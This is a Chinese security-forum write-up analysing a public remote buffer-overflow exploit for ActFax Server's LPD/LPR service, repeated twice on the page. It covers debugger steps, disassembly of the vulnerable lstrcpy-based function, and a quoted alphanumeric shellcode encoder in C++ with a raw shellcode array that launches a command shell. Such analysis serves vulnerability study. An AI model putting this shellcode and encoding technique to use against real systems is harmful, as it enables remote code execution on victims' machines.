-
-
[原创]ActFax Server (LPDLPR) Remote Buffer Overflow Exploit分析
-
2011-2-21 21:37 6167
-
标 题: ActFax Server (LPDLPR) Remote Buffer Overflow Exploit分析
作 者: kkmylove
时 间: 2011-02-21
链 接: http://bbs.pediy.com/showthread.php?p=927998#post927998
●
漏洞来源:
http://www.exploit-db.com/exploits/16176/
●
bug函数定位
在004A4B7D下断点,运行程序(F9),调用漏洞利用程序,
这时程序断在004A4B7D 这里,看堆栈,找到返回程序领空的返回地址。这里一直往下翻,找栈回溯。要翻很远。才能找到一个堆栈的返回地址。
这里我找到
在call处下断点
重新启动程序,然后启动poc程序,程序断在call处。
Ctrl+F8运行
等一会,程序断在了004A4B7D
按小键盘上的“-”减号
出现代码如图所示
选中call一行,直接回车,来到0046CEA0处。即为导致溢出的函数。
●
Bug函数分析
导致溢出的函数反汇编如下:
0046CEA0 /$ 81EC 00020000 sub esp,0x200
0046CEA6 |. 8B8424 080200>mov eax,dword ptr ss:[esp+0x208]
0046CEAD |. 53 push ebx
0046CEAE |. 8B9C24 140200>mov ebx,dword ptr ss:[esp+0x214]
0046CEB5 |. 55 push ebp
0046CEB6 |. 56 push esi
0046CEB7 |. 8B35 94C35100 mov esi,dword ptr ds:[<&KERNEL32.lstrcpy>; kernel32.lstrcpyA
0046CEBD |. 57 push edi
0046CEBE |. 8BBC24 240200>mov edi,dword ptr ss:[esp+0x224]
0046CEC5 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CECA |. 50 push eax ; |String1
0046CECB |. C707 00000000 mov dword ptr ds:[edi],0x0 ; |
0046CED1 |. C703 00000000 mov dword ptr ds:[ebx],0x0 ; |
0046CED7 |. FFD6 call esi ; \lstrcpyA
0046CED9 |. 8BAC24 1C0200>mov ebp,dword ptr ss:[esp+0x21C]
0046CEE0 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CEE5 |. 55 push ebp ; |String1
0046CEE6 |. FFD6 call esi ; \lstrcpyA
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
0046CF02 |. E8 D94A0900 call ActFax.005019E0
0046CF07 |. A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CF0C |. 83C4 04 add esp,0x4
0046CF0F |. 85C0 test eax,eax
0046CF11 |. 75 40 jnz XActFax.0046CF53
0046CF13 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0046CF17 |. 68 88865200 push ActFax.00528688
0046CF1C |. 51 push ecx
0046CF1D |. FFD6 call esi
0046CF1F |. 8D5424 10 lea edx,dword ptr ss:[esp+0x10]
0046CF23 |. 52 push edx
0046CF24 |. E8 B74A0900 call ActFax.005019E0
0046CF29 |. 83C4 04 add esp,0x4
0046CF2C |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
0046CF30 |. 8D8C24 100100>lea ecx,dword ptr ss:[esp+0x110]
0046CF37 |. 50 push eax ; /String2
0046CF38 |. 51 push ecx ; |String1
0046CF39 |. FF15 34C35100 call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CF3F |. 85C0 test eax,eax
0046CF41 |. 75 10 jnz XActFax.0046CF53
0046CF43 |. 5F pop edi
0046CF44 |. 5E pop esi
0046CF45 |. 5D pop ebp
0046CF46 |. B8 01000000 mov eax,0x1
0046CF4B |. 5B pop ebx
0046CF4C |. 81C4 00020000 add esp,0x200
0046CF52 |. C3 retn
0046CF53 |> \A1 88875200 mov eax,dword ptr ds:[0x528788]
0046CF58 |. 85C0 test eax,eax
0046CF5A |. 74 52 je XActFax.0046CFAE
0046CF5C |. 8B35 DC385400 mov esi,dword ptr ds:[0x5438DC]
0046CF62 |. 85F6 test esi,esi
0046CF64 |. 74 48 je XActFax.0046CFAE
0046CF66 |> 6A 00 /push 0x0
0046CF68 |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
0046CF6C |. 68 00010000 |push 0x100
0046CF71 |. 52 |push edx
0046CF72 |. 6A 01 |push 0x1
0046CF74 |. 6A 01 |push 0x1
0046CF76 |. 56 |push esi
0046CF77 |. E8 944C0100 |call ActFax.00481C10
0046CF7C |. 83C4 18 |add esp,0x18
0046CF7F |. 85C0 |test eax,eax
0046CF81 |. 74 24 |je XActFax.0046CFA7
0046CF83 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0046CF87 |. 50 |push eax
0046CF88 |. E8 534A0900 |call ActFax.005019E0
0046CF8D |. 83C4 04 |add esp,0x4
0046CF90 |. 8D4C24 10 |lea ecx,dword ptr ss:[esp+0x10]
0046CF94 |. 8D9424 100100>|lea edx,dword ptr ss:[esp+0x110]
0046CF9B |. 51 |push ecx ; /String2
0046CF9C |. 52 |push edx ; |String1
0046CF9D |. FF15 34C35100 |call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CFA3 |. 85C0 |test eax,eax
0046CFA5 |. 74 17 |je XActFax.0046CFBE
0046CFA7 |> 8B76 20 |mov esi,dword ptr ds:[esi+0x20]
0046CFAA |. 85F6 |test esi,esi
0046CFAC |.^ 75 B8 \jnz XActFax.0046CF66
0046CFAE |> A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CFB3 |. 5F pop edi
0046CFB4 |. 5E pop esi
0046CFB5 |. 5D pop ebp
0046CFB6 |. 5B pop ebx
0046CFB7 |. 81C4 00020000 add esp,0x200
0046CFBD |. C3 retn
在程序里面利用了大量strcpy函数,并且没有对参数进行检查,导致漏洞产生。程序在0046CEF8 处调用strcpy函数,导致返回地址被覆盖。
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
●
Bug利用
漏洞利用程序使用了存字母的shellcode,本人能力有限,就不在此误人子弟了。收集了一些字母shellcode的资料,分享给大家。
转:http://www.7747.net/kf/201012/80407.html
算法描述:将字符取前、后4位各加上一个key(例如0x41),分解为两个字符。
shellcode字符范围为0x00 - 0xFF 为2^8 = 256个字符,每个字符拆解过后的两个部分取值范围为2^4 = 16 = 0x10
加上一个适当的key,以0x41为例每个部分取值范围为0x41 - 0x51 即为ascii码的A - Q,所以全部是A-Q的大写字母。
当然,在会被转换成小写的时候(如Cmail hello 溢出漏洞),选用0x61为key,就得到全小写字母的字符范围。
算法代码示例(C++)
base16.cpp:
#include <stdio.h>
typedef struct _Byte_base16
{
unsigned o1 : 4;
unsigned o0 : 4;
}Byte_base16, *PByte_base16;
unsigned char shellcode[] =
"\x33\xC0" // xor eax, eax
"\x66\xB8\x72\x74" // mov ax, 7472
"\x50" // push eax
"\x68\x6D\x73\x76\x63" // push 6376736D
"\x54" // push esp
"\xB8\xcf\x05\xe7\x77" // mov eax, 0x77e705cf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x66\xBA\x63\x6D" // mov dx, 6D63
"\x52" // push edx
"\xC6\x44\x24\x02\x64" // mov byte ptr [esp+2], 64
"\x54" // push esp
"\xB8\xbf\x8e\x01\x78" // mov eax, 0x78018ebf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x52" // push edx
"\xB8\x1a\xe0\xe6\x77" // mov eax, 0x77e6e01a
"\xFF\xD0"; // call eax
int main(int argc,char* argv[])
{
unsigned char key = 0x41; //key to base16
PByte_base16 p;
int i = 0;
while(shellcode[i])
{
p = (PByte_base16)(&shellcode[i++]);
printf("%c%c",p->o0 + key,p->o1 + key);
}
return 0;
}
poc
16176.rar
漏洞程序
actfax_setup_en.part1.rar
actfax_setup_en.part2.rar
actfax_setup_en.part3.rar
actfax_setup_en.part4.rar
字母shellcode资料
alpha2.rar
黑防2008.4.rar
作 者: kkmylove
时 间: 2011-02-21
链 接: http://bbs.pediy.com/showthread.php?p=927998#post927998
●
http://www.exploit-db.com/exploits/16176/
●
在004A4B7D下断点,运行程序(F9),调用漏洞利用程序,
这时程序断在004A4B7D 这里,看堆栈,找到返回程序领空的返回地址。这里一直往下翻,找栈回溯。要翻很远。才能找到一个堆栈的返回地址。
这里我找到
在call处下断点
重新启动程序,然后启动poc程序,程序断在call处。
Ctrl+F8运行
等一会,程序断在了004A4B7D
按小键盘上的“-”减号
出现代码如图所示
选中call一行,直接回车,来到0046CEA0处。即为导致溢出的函数。
●
导致溢出的函数反汇编如下:
0046CEA0 /$ 81EC 00020000 sub esp,0x200
0046CEA6 |. 8B8424 080200>mov eax,dword ptr ss:[esp+0x208]
0046CEAD |. 53 push ebx
0046CEAE |. 8B9C24 140200>mov ebx,dword ptr ss:[esp+0x214]
0046CEB5 |. 55 push ebp
0046CEB6 |. 56 push esi
0046CEB7 |. 8B35 94C35100 mov esi,dword ptr ds:[<&KERNEL32.lstrcpy>; kernel32.lstrcpyA
0046CEBD |. 57 push edi
0046CEBE |. 8BBC24 240200>mov edi,dword ptr ss:[esp+0x224]
0046CEC5 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CECA |. 50 push eax ; |String1
0046CECB |. C707 00000000 mov dword ptr ds:[edi],0x0 ; |
0046CED1 |. C703 00000000 mov dword ptr ds:[ebx],0x0 ; |
0046CED7 |. FFD6 call esi ; \lstrcpyA
0046CED9 |. 8BAC24 1C0200>mov ebp,dword ptr ss:[esp+0x21C]
0046CEE0 |. 68 68FE5300 push ActFax.0053FE68 ; /String2 = ""
0046CEE5 |. 55 push ebp ; |String1
0046CEE6 |. FFD6 call esi ; \lstrcpyA
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
0046CF02 |. E8 D94A0900 call ActFax.005019E0
0046CF07 |. A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CF0C |. 83C4 04 add esp,0x4
0046CF0F |. 85C0 test eax,eax
0046CF11 |. 75 40 jnz XActFax.0046CF53
0046CF13 |. 8D4C24 10 lea ecx,dword ptr ss:[esp+0x10]
0046CF17 |. 68 88865200 push ActFax.00528688
0046CF1C |. 51 push ecx
0046CF1D |. FFD6 call esi
0046CF1F |. 8D5424 10 lea edx,dword ptr ss:[esp+0x10]
0046CF23 |. 52 push edx
0046CF24 |. E8 B74A0900 call ActFax.005019E0
0046CF29 |. 83C4 04 add esp,0x4
0046CF2C |. 8D4424 10 lea eax,dword ptr ss:[esp+0x10]
0046CF30 |. 8D8C24 100100>lea ecx,dword ptr ss:[esp+0x110]
0046CF37 |. 50 push eax ; /String2
0046CF38 |. 51 push ecx ; |String1
0046CF39 |. FF15 34C35100 call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CF3F |. 85C0 test eax,eax
0046CF41 |. 75 10 jnz XActFax.0046CF53
0046CF43 |. 5F pop edi
0046CF44 |. 5E pop esi
0046CF45 |. 5D pop ebp
0046CF46 |. B8 01000000 mov eax,0x1
0046CF4B |. 5B pop ebx
0046CF4C |. 81C4 00020000 add esp,0x200
0046CF52 |. C3 retn
0046CF53 |> \A1 88875200 mov eax,dword ptr ds:[0x528788]
0046CF58 |. 85C0 test eax,eax
0046CF5A |. 74 52 je XActFax.0046CFAE
0046CF5C |. 8B35 DC385400 mov esi,dword ptr ds:[0x5438DC]
0046CF62 |. 85F6 test esi,esi
0046CF64 |. 74 48 je XActFax.0046CFAE
0046CF66 |> 6A 00 /push 0x0
0046CF68 |. 8D5424 14 |lea edx,dword ptr ss:[esp+0x14]
0046CF6C |. 68 00010000 |push 0x100
0046CF71 |. 52 |push edx
0046CF72 |. 6A 01 |push 0x1
0046CF74 |. 6A 01 |push 0x1
0046CF76 |. 56 |push esi
0046CF77 |. E8 944C0100 |call ActFax.00481C10
0046CF7C |. 83C4 18 |add esp,0x18
0046CF7F |. 85C0 |test eax,eax
0046CF81 |. 74 24 |je XActFax.0046CFA7
0046CF83 |. 8D4424 10 |lea eax,dword ptr ss:[esp+0x10]
0046CF87 |. 50 |push eax
0046CF88 |. E8 534A0900 |call ActFax.005019E0
0046CF8D |. 83C4 04 |add esp,0x4
0046CF90 |. 8D4C24 10 |lea ecx,dword ptr ss:[esp+0x10]
0046CF94 |. 8D9424 100100>|lea edx,dword ptr ss:[esp+0x110]
0046CF9B |. 51 |push ecx ; /String2
0046CF9C |. 52 |push edx ; |String1
0046CF9D |. FF15 34C35100 |call dword ptr ds:[<&KERNEL32.lstrcmpA>] ; \lstrcmpA
0046CFA3 |. 85C0 |test eax,eax
0046CFA5 |. 74 17 |je XActFax.0046CFBE
0046CFA7 |> 8B76 20 |mov esi,dword ptr ds:[esi+0x20]
0046CFAA |. 85F6 |test esi,esi
0046CFAC |.^ 75 B8 \jnz XActFax.0046CF66
0046CFAE |> A1 84865200 mov eax,dword ptr ds:[0x528684]
0046CFB3 |. 5F pop edi
0046CFB4 |. 5E pop esi
0046CFB5 |. 5D pop ebp
0046CFB6 |. 5B pop ebx
0046CFB7 |. 81C4 00020000 add esp,0x200
0046CFBD |. C3 retn
在程序里面利用了大量strcpy函数,并且没有对参数进行检查,导致漏洞产生。程序在0046CEF8 处调用strcpy函数,导致返回地址被覆盖。
0046CEE8 |. 8B8C24 140200>mov ecx,dword ptr ss:[esp+0x214]
0046CEEF |. 8D9424 100100>lea edx,dword ptr ss:[esp+0x110]
0046CEF6 |. 51 push ecx ; /String2
0046CEF7 |. 52 push edx ; |String1
0046CEF8 |. FFD6 call esi ; \lstrcpyA
0046CEFA |. 8D8424 100100>lea eax,dword ptr ss:[esp+0x110]
0046CF01 |. 50 push eax
●
漏洞利用程序使用了存字母的shellcode,本人能力有限,就不在此误人子弟了。收集了一些字母shellcode的资料,分享给大家。
转:http://www.7747.net/kf/201012/80407.html
算法描述:将字符取前、后4位各加上一个key(例如0x41),分解为两个字符。
shellcode字符范围为0x00 - 0xFF 为2^8 = 256个字符,每个字符拆解过后的两个部分取值范围为2^4 = 16 = 0x10
加上一个适当的key,以0x41为例每个部分取值范围为0x41 - 0x51 即为ascii码的A - Q,所以全部是A-Q的大写字母。
当然,在会被转换成小写的时候(如Cmail hello 溢出漏洞),选用0x61为key,就得到全小写字母的字符范围。
算法代码示例(C++)
base16.cpp:
#include <stdio.h>
typedef struct _Byte_base16
{
unsigned o1 : 4;
unsigned o0 : 4;
}Byte_base16, *PByte_base16;
unsigned char shellcode[] =
"\x33\xC0" // xor eax, eax
"\x66\xB8\x72\x74" // mov ax, 7472
"\x50" // push eax
"\x68\x6D\x73\x76\x63" // push 6376736D
"\x54" // push esp
"\xB8\xcf\x05\xe7\x77" // mov eax, 0x77e705cf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x66\xBA\x63\x6D" // mov dx, 6D63
"\x52" // push edx
"\xC6\x44\x24\x02\x64" // mov byte ptr [esp+2], 64
"\x54" // push esp
"\xB8\xbf\x8e\x01\x78" // mov eax, 0x78018ebf
"\xFF\xD0" // call eax
"\x99" // cdq
"\x52" // push edx
"\xB8\x1a\xe0\xe6\x77" // mov eax, 0x77e6e01a
"\xFF\xD0"; // call eax
int main(int argc,char* argv[])
{
unsigned char key = 0x41; //key to base16
PByte_base16 p;
int i = 0;
while(shellcode[i])
{
p = (PByte_base16)(&shellcode[i++]);
printf("%c%c",p->o0 + key,p->o1 + key);
}
return 0;
}
poc
16176.rar
漏洞程序
actfax_setup_en.part1.rar
actfax_setup_en.part2.rar
actfax_setup_en.part3.rar
actfax_setup_en.part4.rar
字母shellcode资料
alpha2.rar
黑防2008.4.rar
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
谁下载
kanxue
xingbing
uyhj
zxc
Five
执着我一生
davisneilp
lmsoft
kofboy
firefly
ttstation
斩天
EricAzhe
lorde
zhuliang
sixL
Caten
oke
上网鱼
zhingma
luochen
rocketming
ycdear
ugvjewxf
phperl
aicode
hwfdvd
youmikoo
helpmsg
coolwxd
hmilywen
qazwsxedcr
hufo
ggdd
jerrylhj
hawkish
ComexeHy
taotzu
苏陈
riusksk
mcalin
JohnsonGuo
kissoks
lovemfc
XPoy
s零f
zfjzfj
Cyane
huti
zapline
哈哈在世
仙果
huzhao
雪妖
yoke
guobing
rainstop
leeone
ytfsse
weish
zyr零零发
kkblue
darkplayer
菜的要死
evomon
yeweijun
KooJiSung
sillyer
splitpants
loving
jasonzhou
菊冬
ylbhz
cscoder
loongboy
ProgmBoy
天行客
alargel
ccyuio
gongxingqi
HzCoder
kkmylove
imbadyc
instruder
navekit
深夜寂静
gjden
StudyRush
dragonltx
coffeemlx
justFWD
ghosthu
QEver
病武松
isstart
TPDD
无泪城
hqm
ycmint
谁下载
kanxue
xingbing
uyhj
zxc
Five
执着我一生
davisneilp
lmsoft
kofboy
firefly
ttstation
斩天
EricAzhe
lorde
zhuliang
sixL
Caten
oke
上网鱼
zhingma
luochen
rocketming
ycdear
ugvjewxf
phperl
aicode
hwfdvd
youmikoo
helpmsg
coolwxd
hmilywen
qazwsxedcr
hufo
ggdd
jerrylhj
hawkish
ComexeHy
taotzu
苏陈
riusksk
mcalin
JohnsonGuo
kissoks
lovemfc
XPoy
s零f
zfjzfj
Cyane
huti
zapline
哈哈在世
仙果
huzhao
雪妖
yoke
guobing
rainstop
leeone
ytfsse
weish
zyr零零发
kkblue
darkplayer
菜的要死
evomon
yeweijun
KooJiSung
sillyer
splitpants
loving
jasonzhou
菊冬
ylbhz
cscoder
loongboy
ProgmBoy
天行客
alargel
ccyuio
gongxingqi
HzCoder
kkmylove
imbadyc
instruder
navekit
深夜寂静
gjden
StudyRush
dragonltx
coffeemlx
justFWD
ghosthu
QEver
病武松
isstart
TPDD
无泪城
hqm
ycmint
看原图